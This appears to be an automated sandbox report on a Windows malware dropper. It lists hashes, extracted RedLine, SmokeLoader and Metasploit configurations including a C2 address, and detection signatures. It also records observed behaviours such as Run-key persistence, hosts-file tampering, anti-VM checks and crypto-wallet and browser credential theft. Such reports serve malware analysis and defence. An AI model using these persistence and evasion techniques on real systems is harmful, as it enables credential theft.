Resubmissions
19-08-2021 18:59 | 210819-yrzbdtvqln | 10
18-08-2021 20:25 | 210818-4hztrzavcs | 10
18-08-2021 17:24 | 210818-9p8lqjhwv2 | 10
17-08-2021 06:12 | 210817-kl4jvaaq7x | 10
16-08-2021 10:04 | 210816-nwc3tqkr3a | 10
16-08-2021 10:04 | 210816-5r5rafnh7e | 10
16-08-2021 10:04 | 210816-kdgh648t5e | 10
16-08-2021 09:37 | 210816-9esgfwsmfe | 10
16-08-2021 08:13 | 210816-26la9rblgn | 10
17-08-2021 08:51 | 210817-w2l5yq2wln

Analysis
max time kernel: 1804s
max time network: 1807s
platform: windows11_x64
resource: win11
submitted: 16-08-2021 10:04
Static task: static1
Behavioral task: behavioral1
  Sample: EB7233922891E1DAD0434FBD52623647.exe
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: EB7233922891E1DAD0434FBD52623647.exe
  Resource: win11
Behavioral task: behavioral3
  Sample: EB7233922891E1DAD0434FBD52623647.exe
  Resource: win10v20210408
General
Target: EB7233922891E1DAD0434FBD52623647.exe
Size: 7.9MB
MD5: eb7233922891e1dad0434fbd52623647
SHA1: 331126b108532ab9a1e932141bff55a38656bce9
SHA256: b39e29c24003441609c457a3455cae9d9fb6f4462f5e06d0c1d317d243711cb8
SHA512: 597fbb0f397c45c8a2c5f63893c6d6bd4641e952510dfcac05dadb7afaaf4e005df1261649d4e79951979bad0be1fb09feebac7a6d23c31679590cbf40e1d4ac
Malware Config
Extracted: metasploit (windows/single_exec)
Extracted: redline (installs3, 65.21.228.92:46802)
Extracted: smokeloader (2020)
Signatures
Glupteba Payload 1 IoCs
Processes:
resource | yara_rule
behavioral2/memory/4504-206-0x0000000001650000-0x0000000001F76000-memory.dmp | family_glupteba
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1008 | 4848 | rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4176 | 4848 | rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5264 | 4848 | rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine Payload 8 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\Documents\LvJ59gJxc3LSPWvaIC75WK3C.exe | family_redline
C:\Users\Admin\Documents\bAGRnF23dqqSQc9GLsP_8f2i.exe | family_redline
behavioral2/memory/5236-337-0x000001AEC8E20000-0x000001AEC8E39000-memory.dmp | family_redline
C:\Users\Admin\Documents\bAGRnF23dqqSQc9GLsP_8f2i.exe | family_redline
behavioral2/memory/4636-435-0x0000000000000000-mapping.dmp | family_redline
behavioral2/memory/5392-481-0x0000000000000000-mapping.dmp | family_redline
behavioral2/memory/4840-488-0x0000000000000000-mapping.dmp | family_redline
behavioral2/memory/4840-523-0x00000000052E0000-0x00000000058F8000-memory.dmp | family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.
Suspicious use of NtCreateProcessExOtherParentProcess 19 IoCs
Processes:
description | pid | process | target process
PID 1432 created 1096 | 1432 | WerFault.exe | rundll32.exe
PID 3188 created 4504 | 3188 | WerFault.exe | Info.exe
PID 5792 created 5288 | 5792 | WerFault.exe | S9vvbu_thmJNivbyrd5cbgjY.exe
PID 5832 created 5276 | 5832 | WerFault.exe | 1JXoSiUoBQDRFxKQt6PfAJQT.exe
PID 5992 created 5556 | 5992 | WerFault.exe | KaN6V1t36aPvGbjwrCNT4frv.exe
PID 5824 created 5340 | 5824 | jfiag3g_gg.exe | ZP8ROxtPgq7xzmkTnY1ILt2W.exe
PID 5740 created 5592 | 5740 | WerFault.exe | bXB9E3wOjLBBoAzWOKy1jhXH.exe
PID 5372 created 5192 | 5372 | Xuvylitadae.exe | S5JNKYGQ09fmPKqgYZFlX5Wl.exe
PID 2104 created 2000 | 2104 | WerFault.exe | rundll32.exe
PID 3976 created 4408 | 3976 | WerFault.exe | rundll32.exe
PID 1204 created 1884 | 1204 | WerFault.exe | askinstall53.exe
PID 6736 created 7084 | 6736 | WerFault.exe | anyname.exe
PID 5428 created 7084 | 5428 | WerFault.exe | anyname.exe
PID 5524 created 7084 | 5524 | WerFault.exe | anyname.exe
PID 3896 created 3128 | 3896 | WerFault.exe | A126.exe
PID 6356 created 5452 | 6356 | WerFault.exe | explorer.exe
PID 5764 created 1400 | 5764 | WerFault.exe | 8421129.exe
PID 5512 created 4780 | 5512 | WerFault.exe | 1478644.exe
PID 3004 created 5344 | 3004 | WerFault.exe | 4881157.exe
Processes:
resource | yara_rule
behavioral2/memory/4504-206-0x0000000001650000-0x0000000001F76000-memory.dmp | evasion
C:\Users\Admin\Documents\nmRKRFlsM2jdww3bmd_iqMIN.exe | evasion
C:\Users\Admin\Documents\K9nJsFAus_AD4WbNTjIG3wOs.exe | evasion
C:\Users\Admin\Documents\i51OEtivp64F1h3jriSb9179.exe | evasion
C:\Users\Admin\Documents\K9nJsFAus_AD4WbNTjIG3wOs.exe | evasion
behavioral2/memory/4840-523-0x00000000052E0000-0x00000000058F8000-memory.dmp | evasion
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata: ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
Vidar Stealer 1 IoCs
Processes:
resource | yara_rule
behavioral2/memory/5556-296-0x00000000049F0000-0x0000000004A8D000-memory.dmp | family_vidar
Blocklisted process makes network request 9 IoCs
Processes:
flow | pid | process
117 | 5264 | rUNdlL32.eXe
193 | 6456 | MsiExec.exe
195 | 6456 | MsiExec.exe
196 | 6456 | MsiExec.exe
197 | 6456 | MsiExec.exe
198 | 6456 | MsiExec.exe
206 | 6456 | MsiExec.exe
260 | 4276 | powershell.exe
261 | 4276 | powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | aipackagechainer.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | h5Mf7fCP0iLoTpkZt0_ezgBy.exe
Executes dropped EXE 64 IoCs
Processes:
pid | process
4780 | KRSetp.exe
4924 | Folder.exe
4992 | Folder.exe
4504 | Info.exe
3980 | Installation.exe
5168 | yOpfFns9feXR1oA37BXrUSoj.exe
5180 | i51OEtivp64F1h3jriSb9179.exe
5192 | S5JNKYGQ09fmPKqgYZFlX5Wl.exe
5204 | LvJ59gJxc3LSPWvaIC75WK3C.exe
5216 | h5Mf7fCP0iLoTpkZt0_ezgBy.exe
5236 | OaUqDiJqLrReD6nAIAxVSWA8.exe
5228 | K9nJsFAus_AD4WbNTjIG3wOs.exe
5252 | nmRKRFlsM2jdww3bmd_iqMIN.exe
5264 | ZM0tOe8uO666xAL03x_SEt7G.exe
5276 | 1JXoSiUoBQDRFxKQt6PfAJQT.exe
5288 | S9vvbu_thmJNivbyrd5cbgjY.exe
5300 | 6fb0NKLzbR9O1Hnpb8meEjoY.exe
5316 | bEYG8MCmwS_N0mgL9uYFs3Jb.exe
5328 | MsKeXpA3JCm5KJWAfbFTLe6p.exe
5340 | ZP8ROxtPgq7xzmkTnY1ILt2W.exe
5364 | bAGRnF23dqqSQc9GLsP_8f2i.exe
5556 | KaN6V1t36aPvGbjwrCNT4frv.exe
5548 | iHcz2PjFZ8e9IDvRcRQLV9o9.exe
5592 | bXB9E3wOjLBBoAzWOKy1jhXH.exe
5584 | bFClUtu0XfsHUGnX6uO9BE2D.exe
5908 | 22222.exe
6108 | bEYG8MCmwS_N0mgL9uYFs3Jb.exe
5260 | iHcz2PjFZ8e9IDvRcRQLV9o9.exe
2260 | AGV_ZCjRSXUJEYPKIJWOth72.exe
796 | X6pFteX1hujq71gAoddJIl03.exe
1284 | X6pFteX1hujq71gAoddJIl03.tmp
1568 | customer3.exe
5884 | md8_8eus.exe
5836 | jooyu.exe
2708 | 1cu20YjSd19Ml5gGnIdtbCyZ.exe
3180 | 11111.exe
5824 | jfiag3g_gg.exe
1400 | 8421129.exe
5732 | K9nJsFAus_AD4WbNTjIG3wOs.exe
4084 | nmRKRFlsM2jdww3bmd_iqMIN.exe
1588 | 3544711.exe
4636 | i51OEtivp64F1h3jriSb9179.exe
4252 | md9_1sjm.exe
1884 | askinstall53.exe
5896 | K9nJsFAus_AD4WbNTjIG3wOs.exe
5248 | 11111.exe
5744 | ultramediaburner.tmp
5908 | 22222.exe
5480 | Setup.exe
5392 | K9nJsFAus_AD4WbNTjIG3wOs.exe
496 | GameBox64bit.exe
4840 | nmRKRFlsM2jdww3bmd_iqMIN.exe
5692 | Cleaner Installation.exe
3284 | Versiumresearch.exe
3632 | MediaBurner2.exe
3980 | note8876.exe
1664 | zhangfei.exe
1884 | askinstall53.exe
3472 | GameBoxWin64.exe
2536 | Weather Installation.exe
1604 | Conhost.exe
2240 | MediaBurner2.tmp
5460 | msedge.exe
6112 | 11111.exe
Processes:
resource | yara_rule
behavioral2/memory/5884-367-0x0000000000400000-0x000000000067D000-memory.dmp | vmprotect
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 9A5E.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 9A5E.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | bAGRnF23dqqSQc9GLsP_8f2i.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | bAGRnF23dqqSQc9GLsP_8f2i.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | LvJ59gJxc3LSPWvaIC75WK3C.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | LvJ59gJxc3LSPWvaIC75WK3C.exe
Drops startup file 2 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | customer3.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | customer3.exe
Loads dropped DLL 64 IoCs
Processes:
pid | process
1096 | rundll32.exe
5236 | OaUqDiJqLrReD6nAIAxVSWA8.exe
1284 | X6pFteX1hujq71gAoddJIl03.tmp
1284 | X6pFteX1hujq71gAoddJIl03.tmp
2000 | rundll32.exe
5692 | Cleaner Installation.exe
3472 | GameBoxWin64.exe
3472 | GameBoxWin64.exe
2536 | Weather Installation.exe
2240 | MediaBurner2.tmp
4408 | rundll32.exe
3472 | GameBoxWin64.exe
2488 | MsiExec.exe
2488 | MsiExec.exe
4976 | MsiExec.exe
4976 | MsiExec.exe
4976 | MsiExec.exe
5504 | MsiExec.exe
5504 | MsiExec.exe
6456 | MsiExec.exe
6456 | MsiExec.exe
6456 | MsiExec.exe
6456 | MsiExec.exe
6456 | MsiExec.exe
6456 | MsiExec.exe
6456 | MsiExec.exe
6456 | MsiExec.exe
6456 | MsiExec.exe
6456 | MsiExec.exe
3896 | WerFault.exe
3896 | WerFault.exe
3896 | WerFault.exe
6816 | MsiExec.exe
6816 | MsiExec.exe
5424 | Weather_Installation.exe
5424 | Weather_Installation.exe
5424 | Weather_Installation.exe
5424 | Weather_Installation.exe
5424 | Weather_Installation.exe
4032 | Weather.exe
5424 | Weather_Installation.exe
4032 | Weather.exe
4032 | Weather.exe
5424 | Weather_Installation.exe
2788 | Weather.exe
2360 | Weather.exe
2360 | Weather.exe
2360 | Weather.exe
6012 | Weather.exe
6012 | Weather.exe
6012 | Weather.exe
2360 | Weather.exe
1108 | Weather.exe
1108 | Weather.exe
1108 | Weather.exe
6656 | Weather.exe
6656 | Weather.exe
6656 | Weather.exe
6656 | Weather.exe
492 | Weather.exe
492 | Weather.exe
492 | Weather.exe
6396 | Weather.exe
6396 | Weather.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Processes:
resource | yara_rule
C:\Users\Admin\Documents\LvJ59gJxc3LSPWvaIC75WK3C.exe | themida
C:\Users\Admin\Documents\bAGRnF23dqqSQc9GLsP_8f2i.exe | themida
C:\Users\Admin\Documents\bAGRnF23dqqSQc9GLsP_8f2i.exe | themida
behavioral2/memory/5364-370-0x0000000000BD0000-0x0000000000BD1000-memory.dmp | themida
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 10 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" | msedge.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | Weather_Installation.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Weather = "C:\\Users\\Admin\\AppData\\Roaming\\Weather\\Weather.exe --PH33" | Weather_Installation.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" | msedge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | ultramediaburner.tmp
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\Taewaezhobume.exe\"" | aipackagechainer.exe
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | aipackagechainer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ | aipackagechainer.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | bAGRnF23dqqSQc9GLsP_8f2i.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | LvJ59gJxc3LSPWvaIC75WK3C.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | md9_1sjm.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | note8876.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 9A5E.exe
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
21 | ipinfo.io
48 | ipinfo.io
80 | ip-api.com
121 | ipinfo.io
173 | ip-api.com
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
pid | process
5364 | bAGRnF23dqqSQc9GLsP_8f2i.exe
5204 | LvJ59gJxc3LSPWvaIC75WK3C.exe
5512 | WerFault.exe
5772 | 9A5E.exe
Suspicious use of SetThreadContext 8 IoCs
Processes:
description | pid | process | target process
PID 5316 set thread context of 6108 | 5316 | bEYG8MCmwS_N0mgL9uYFs3Jb.exe | bEYG8MCmwS_N0mgL9uYFs3Jb.exe
PID 5548 set thread context of 5260 | 5548 | iHcz2PjFZ8e9IDvRcRQLV9o9.exe | iHcz2PjFZ8e9IDvRcRQLV9o9.exe
PID 5180 set thread context of 4636 | 5180 | WerFault.exe | i51OEtivp64F1h3jriSb9179.exe
PID 5228 set thread context of 5392 | 5228 | K9nJsFAus_AD4WbNTjIG3wOs.exe | K9nJsFAus_AD4WbNTjIG3wOs.exe
PID 5252 set thread context of 4840 | 5252 | nmRKRFlsM2jdww3bmd_iqMIN.exe | nmRKRFlsM2jdww3bmd_iqMIN.exe
PID 496 set thread context of 5128 | 496 | GameBox64bit.exe | GameBox64bit.exe
PID 5168 set thread context of 6704 | 5168 | yOpfFns9feXR1oA37BXrUSoj.exe | yOpfFns9feXR1oA37BXrUSoj.exe
PID 5216 set thread context of 5968 | 5216 | h5Mf7fCP0iLoTpkZt0_ezgBy.exe | h5Mf7fCP0iLoTpkZt0_ezgBy.exe
Drops file in Program Files directory 33 IoCs
Processes:
description | ioc | process
File created | C:\Program Files\Microsoft Office 15\ATKMCPCBQB\ultramediaburner.exe.config | aipackagechainer.exe
File created | C:\Program Files (x86)\Windows Photo Viewer\Taewaezhobume.exe.config | aipackagechainer.exe
File created | C:\Program Files\Microsoft Office 15\ATKMCPCBQB\ultramediaburner.exe | aipackagechainer.exe
File created | C:\Program Files (x86)\UltraMediaBurner\unins000.dat | ultramediaburner.tmp
File created | C:\Program Files (x86)\UltraMediaBurner\is-KTNRU.tmp | ultramediaburner.tmp
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe | Setup.exe
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe | Setup.exe
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | Setup.exe
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | Setup.exe
File created | C:\Program Files (x86)\Windows Photo Viewer\Taewaezhobume.exe | aipackagechainer.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\jooyu.exe | bFClUtu0XfsHUGnX6uO9BE2D.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | bFClUtu0XfsHUGnX6uO9BE2D.exe
File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | bFClUtu0XfsHUGnX6uO9BE2D.exe
File opened for modification | C:\Program Files (x86)\UltraMediaBurner\unins000.dat | ultramediaburner.tmp
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | Setup.exe
File created | C:\Program Files (x86)\UltraMediaBurner\is-9C8N6.tmp | ultramediaburner.tmp
File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | bFClUtu0XfsHUGnX6uO9BE2D.exe
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe | Setup.exe
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe | Setup.exe
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe | Setup.exe
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe | Setup.exe
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe | Setup.exe
File created | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\resources.pak | h5Mf7fCP0iLoTpkZt0_ezgBy.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | bFClUtu0XfsHUGnX6uO9BE2D.exe
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\d.INTEG.RAW | note8876.exe
File opened for modification | C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe | ultramediaburner.tmp
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\resources.pak | h5Mf7fCP0iLoTpkZt0_ezgBy.exe
File created | C:\Program Files (x86)\GameBox INC\GameBox\d | note8876.exe
File created | C:\Program Files (x86)\GameBox INC\GameBox\d.jfm | note8876.exe
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\d.jfm | note8876.exe
File created | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini | Setup.exe
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\d | note8876.exe
File created | C:\Program Files (x86)\GameBox INC\GameBox\tmp.edb | note8876.exe
Drops file in Windows directory 23 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\Installer\f74eb31.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIF351.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID57.tmp | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File created | C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} | msiexec.exe
File created | C:\Windows\SystemTemp\~DFDF8AC9F3942F7FFD.TMP | msiexec.exe
File created | C:\Windows\Installer\f74eb31.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIF227.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIF4E8.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIAE5.tmp | msiexec.exe
File created | C:\Windows\SystemTemp\~DF51048722BFEFC2F8.TMP | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIF022.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI8E0.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File created | C:\Windows\SystemTemp\~DF6FFB5CFF992020C3.TMP | msiexec.exe
File created | C:\Windows\SystemTemp\~DF07ECE270F696013C.TMP | msiexec.exe
File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | WerFault.exe
File opened for modification | C:\Windows\Installer\MSIF73B.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIFAC6.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI13EF.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI2584.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIBB3E.tmp | msiexec.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash 19 IoCs
Processes:
pid | pid_target | process | target process
1832 | 1096 | WerFault.exe | rundll32.exe
1492 | 4504 | WerFault.exe | Info.exe
6092 | 5288 | WerFault.exe | S9vvbu_thmJNivbyrd5cbgjY.exe
508 | 5276 | WerFault.exe | 1JXoSiUoBQDRFxKQt6PfAJQT.exe
5272 | 5556 | WerFault.exe | KaN6V1t36aPvGbjwrCNT4frv.exe
1556 | 5340 | WerFault.exe | ZP8ROxtPgq7xzmkTnY1ILt2W.exe
4280 | 5592 | WerFault.exe | bXB9E3wOjLBBoAzWOKy1jhXH.exe
4780 | 5192 | WerFault.exe | S5JNKYGQ09fmPKqgYZFlX5Wl.exe
5180 | 2000 | WerFault.exe | rundll32.exe
5984 | 4408 | WerFault.exe | rundll32.exe
5348 | 1884 | WerFault.exe | askinstall53.exe
6148 | 7084 | WerFault.exe | anyname.exe
5792 | 7084 | WerFault.exe | anyname.exe
5512 | 7084 | WerFault.exe | anyname.exe
5724 | 3128 | WerFault.exe | A126.exe
4196 | 5452 | WerFault.exe | explorer.exe
4196 | 1400 | WerFault.exe | 8421129.exe
5544 | 4780 | WerFault.exe | 1478644.exe
6676 | 5344 | WerFault.exe | 4881157.exe
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | bEYG8MCmwS_N0mgL9uYFs3Jb.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | bEYG8MCmwS_N0mgL9uYFs3Jb.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | bEYG8MCmwS_N0mgL9uYFs3Jb.exe
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Enumerates system info in registry 2 TTPs 40 IoCs
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | cmd.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | 1478644.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | 1478644.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | msiexec.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | msiexec.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | cmd.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
-
Kills process with taskkill 2 IoCs
Processes:
pid | process
3784 | taskkill.exe
3340 | taskkill.exe
-
